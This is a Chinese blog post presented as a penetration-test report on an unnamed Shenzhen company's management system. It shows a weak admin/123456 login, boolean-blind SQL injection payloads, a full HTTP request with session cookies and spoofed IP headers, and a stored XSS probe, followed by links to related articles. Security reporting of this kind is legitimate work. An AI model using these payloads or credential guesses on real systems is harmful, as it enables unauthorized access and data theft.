深圳x有限公司漏洞报告

最新推荐文章于 2024-09-17 16:52:57 发布
最新推荐文章于 2024-09-17 16:52:57 发布
阅读量1.6k 收藏 37
点赞数 29
文章标签: 数据挖掘 小程序
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A19911511842/article/details/136580299
版权

深圳xxxxx有限公司漏洞报告

存在漏洞:弱口令,sql注入,存储型xss

1.弱口令

http://xxx.xxx.xxx.xxx:8088/

2.SQL注入

http://xxx.xxx.xxx.xxx:8088/home/main#//Order/Index

3.存储型XSS

http://xxx.xxx.xxx.xxx:8088/home/main#//PrintDevice/Index

弱口令

admin

123456

成功来到管理系统

 

SQL注入

选择订单管理

 

测试注入’ ‘’

 

 

' and 0='1

 

' and 1='1

 

使用布尔盲注

测试出数据库长度为16

' and if(length(database())=16,1,0)='1

 

测试数据库第一位为d

' and if(mid(database(),1,1)='d',1,0)='1

 

后续使用bp进行爆破

GET /Order/GetOrderList?page=1&limit=15&addon=&orderInfo=%27+and+if(mid(database()%2C1%2C1)%3D%27d%27%2C1%2C0)%3D%271&orderStatus= HTTP/1.1

Host: xxx.xxx.xxx.xxx:8088

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Referer: http://xxx.xxx.xxx.xxx:8088/Order/Index

Cookie: .AspNetCore.Session=CfDJ8AQHohFLrupNnfYlr4WRS3YXBsxAsGl9lIouBEENxjbbE3be%2Bu2yfb6cGNwXD4C9v7UDxCcjSv0ZwW5BJbofLoa3cQshDWE8BQpp0KU935V7lWLMeV5jwbumgRNVlX6l5mlDmYZnvQTRJeJmPinEG8GlM33qawzWaCTiPYK1IDv4; .AspNetCore.Cookies=CfDJ8AQHohFLrupNnfYlr4WRS3abqqskD-4pyPjtNH1Mb4BeaN-b0yBzqBcSlNoy51WGYGFzP_6Oi_PTknRJlSxcMCug3Hacljoofu3FcUVF2FV51tk8gc90xmiPMmS979cYM9yGi9dNagIrmRwonC1UxTtKus4YhIY1KcAm0y6JGesJ1BJWI2I1zyqzUiEZo8eH1HQ7oL-2hUHJ0_sa8t_64g94FrlKFbNlGYqO2NFPL0cmR2KYoCvfiZVOjOG72hLwElOlg9GHuV-k0LBsnM3txBhGOkTkpaBpzOr11ISR3MdDo0rmQ31rc7ggrJ2CmNyYCnQXxVAuRgePFdIIemhsG8Pn5VQkJSIAdQQOjTz8eU0qCSoior9Vfl1Jn9o-KcFWexAAIPteKK7z7eWdylDvI4bEVpnT043ulEmjkFH5qKtpz_5PMItz53CjohfbMUPIya4IOzBehSbm2exVbNkGyuOLJ_WYDsk1BgQKjpBDHfYH8tuFuB0E2UpUtmj6fHJNUONUhUjt__gBWKoi2DtRcD0

X-Forwarded-For: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

爆破参数:orderInfo

成功爆破出库名:dbprintproject

 

存储型XSS

来到设备管理,进行添加

测试<script>alert(1)</script>

 

 

方班网安人才教育服务中心
关注
漏洞复现】思迅商旗-Operator-loaddata-信息泄露
知黑而守白
01-16 183
思迅商旗10是专注于零售和餐饮行业的综合商业管理软件。以稳健、智能、数据准确为核心,整合了核心管理要点,提供云管理、云会员、周边应用商店等功能。通过灵活的供应商管理和云平台应用,实现了商业的数字化和智能化管理。商旗10的特点在于全面、灵活,为企业提供了集成的管理平台,助力提高经营效率。思迅商旗10集团商业管理系统 Operator 接口权限设置不当,攻击者可以通过利用此漏洞,上传恶意文件到系统中,可能导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
漏洞复现】安全云平台存在任意文件下载getshell
失心少年
10-13 749
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息。1.利用GET请求如下POC可得到验证。
友盟SDK越权漏洞分析报告
键盘的起始页
06-29 782
今年9月22日,360信息安全部的Vulpecker安全团队发现了国内消息推送厂商友盟的SDK存在可越权调用未导出组件的漏洞,并利用该漏洞实现了对使用了友盟SDK的APP的任意组件的恶意调用、任意虚假消息的通知、远程代码执行等攻击测试。 经过分析验证,360Vulpecker安全团队将此漏洞细节第一时间提交给友盟进行修复。10月18日,友盟官方发布最新版3.1.3修复漏洞。为了确保受此漏洞影响的终端用户有充分的时间进行安全更新,12月6日,360Vulpecker安全团队首次向外界公开披露漏洞信息。 .
网络摄像头 登录绕过 RCE漏洞 数据分析报告
whatday的专栏
09-01 2417
目录 1. 事件概述 2. 漏洞分析 2.1 目标设备的相关信息 2.2 登录绕过漏洞 2.3 Web 服务基于缓冲区溢出的远程代码执行漏洞(无需认证) 2.4 RTSP 服务基于缓冲区溢出的远程代码执行漏洞(无需认证) 3. 漏洞影响范围 4. 漏洞修复建议 4.1 对用户的修复建议 4.2 对厂商的修复建议 5. 总结 6. 相关链接 1. 事件概述 深圳市丽欧电子有限公司(NEO Coolcam,以下简称酷视)[1],是一家集网络数码产品研发、生产、营销于一体的高新技术企
解决方案-漏洞管理平台-入门信息安全知识点
2401_84915584的博客
07-02 317
国家信息安全漏洞共享平台(CNVD)信息安全漏洞周报 - 副本.PDF,国家信息安全漏洞共享平台(CNVD) 信息安全漏洞周报 2016 年05 月23 日-
漏洞复现】思迅商旗-setaipositemimage-任意文件上传
知黑而守白
01-16 571
思迅商旗10是专注于零售和餐饮行业的综合商业管理软件。以稳健、智能、数据准确为核心,整合了核心管理要点,提供云管理、云会员、周边应用商店等功能。通过灵活的供应商管理和云平台应用,实现了商业的数字化和智能化管理。商旗10的特点在于全面、灵活,为企业提供了集成的管理平台,助力提高经营效率。思迅商旗10集团商业管理系统 SetAiPosItemImage 接口权限设置不当,攻击者可以通过利用此漏洞,上传恶意文件到系统中,可能导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
多家防火墙设备存在信息泄露漏洞
weixin_50464560的博客
06-18 1886
概述 漏洞名称 多家防火墙设备存在信息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164-1.5.2 任子行下一代防火墙SURF-NGSA-V-3000 中科网威下一代防火墙F6600L-1.5.2 任子行网络安全审计系统内置报表 网域科技防火墙ACF-200-1.0.0 锐捷RG-ISG视频监控网关6000-ISG02C 天融信ACM-51538-V3.0.0176 无锡城安C
漏洞复现】睿因科技-wavlink-路由器-多处前台RCE
知黑而守白
01-05 410
睿因(wavlink)路由器,cgi-bin下的多处接口存在命令执行漏洞,允许攻击者通过构造特制的请求包执行系统命令,从而获取未授权的访问权限。攻击者可以利用这个漏洞来获取敏感信息、篡改配置,甚至导致网络和设备的不可预测的损害。睿因(wavlink)是一个国际知名品牌,其营销总部设立在中国香港,生产总部位于中国深圳。睿因(wavlink)以高科技和人性化为出发点,围绕PC及移动设备的周边,提出了无线、网络、数码、影音、多显示等解决方案。
1day-明源云erp某接口存在SQL注入漏洞
weixin_43167326的博客
04-16 1530
明源云ERP产品旨在帮助企业实现数字化、智能化的管理,提高企业运营效率和核心竞争力。该系统某接口存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
补天漏洞厂商资产数据爬虫以及总漏洞量可视化分析
浪子燕青的博客
02-23 2391
title: 补天厂商数据爬虫 copyright: true top: 0 date: 2019-07-11 23:04:53 tags: 爬虫 categories: 爬虫笔记 permalink: password: keywords: 补天爬虫 description: 一次简单的信息获取,尝试对补天厂商数据爬取 他希望快点完成这个交易,把后路给断了,没了后路就不用怕什么了,谁说的来着,想要翻过一堵高墙,最好的办法是先把自己的帽子扔过去,这样你自然就有了翻墙的决心。 补天的厂商分为专属SRC,公.
智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现
0xSec
08-16 836
智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
大数据新视界 --大数据大厂之数据挖掘入门:用 R 语言开启数据宝藏的探索之旅
青云交的博客
09-14 2268
踏入大数据新视界,R 语言如璀璨魔法钥匙,开启数据宝藏之门。本文深入剖析 R 语言在数据挖掘中的非凡魅力与优势,涵盖丰富包与函数库、强大可扩展性及惊艳的数据可视化。详述常见数据挖掘算法及生动案例,从决策树到随机森林等。深度洞察数据挖掘技术未来趋势,包括自动化智能化、深度学习广泛应用等。呈现 R 语言多元应用场景,给出实用学习建议。诚邀读者分享经验,一同开启精彩的数据宝藏探索之旅。
小程序——生命周期
2202_75345049的博客
09-11 1113
关于生命周期,官方的流程图是这样的看起来复杂难懂,下面让我们慢慢了解应用生命周期是指应用程序进程从创建到消亡的整个过程小程序的生命周期指的是 小程序从启动到销毁的整个过程在打开一个小程序应用的时候都需要经历一系列的初始化步骤,比如页面是否加载完成、页面是否初次渲染完成等等。在此过程中,小程序也会运行被称为生命周期钩子的函数,这些函数由小程序框架本身提供,被称为生命周期函数,生命周期函数会按照顺序依次自动触发调用。帮助程序员在特定的时机执行特定的操作,辅助程序员完成一些比较复杂的逻辑。
小程序面试题五
笃励的博客
09-11 1214
Vue和微信小程序在多个方面存在明显的区别。Vue是一种更加通用和灵活的前端框架,适用于构建各种规模的Web应用;而微信小程序则是一种专门为微信平台设计的应用开发框架,具有更多的限制和规范。开发者可以根据具体需求和项目特点选择适合的技术栈进行开发。
开源 AI 智能名片链动 2+1 模式 O2O 商城小程序在社群活动中的应用与时机选择
最新发布
专注MarTech应用研究与实施方案
09-17 593
本文探讨了开源 AI 智能名片链动 2+1 模式 O2O 商城小程序在社群经济中的重要性,着重分析了如何借助该小程序适时举办大型活动以维持和引爆社群活跃度。通过对活动时机选择的研究,强调了针对社群用户量身定制活动时机的必要性,以赢得用户的高度参与。
优购电商小程序的设计与实现+ssm(lw+演示+源码+运行)
程序员入门进阶
09-13 1569
目 录摘 要IIIAbstract11 系统概述21.1 概述31.2课题意义41.3 主要内容52 系统开发环境62.1微信开发者工具62.2小程序框架以及目录结构介绍62.3 JAVA简介72.4 MySQL数据库72.5 SSM三大框架73 需求分析83.1 系统设计目标83.2需求分析概述93.3 系统可行性分析93.4经济可行性103.5操作可行性: 113.6系统流程和逻辑124系统概要设计134.1 概述144.2 系统结构154.3. 数据库设计164.3.1 数据库实体17。
开源链动 2+1 模式 AI 智能名片与 S2B2C 商城小程序在用户运营中的应用
专注MarTech应用研究与实施方案
09-15 920
本文深入探讨了用户运营中不同用户阶段的特点及策略,引入“开源链动 2+1 模式 AI 智能名片 S2B2C 商城小程序”,分析其在用户运营各个阶段的作用和价值,旨在为企业提供更高效的用户运营方案,实现用户价值的最大化和企业的可持续发展。
计算机毕业设计体育资讯个性化推荐网站网站内容留言评论前台注册后台管理/springboot/javaWEB/J2EE/MYSQL数据库/vue前后分离小程序
计算机程序开发设计
09-14 516
一、网站内容二、留言评论系统三、前台注册与登录四、后台管理系统五、技术栈。
ASDTX有限公司系统渗透测试发现的关键漏洞报告
ASDTXT(深圳有限公司的系统渗透测试报告由网神信息技术(北京)股份有限公司在2023年1月6日完成。该报告是针对ASDTX有限公司信息系统进行的安全评估,旨在检查潜在的漏洞和风险。报告由项目负责人张晓龙和审核...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值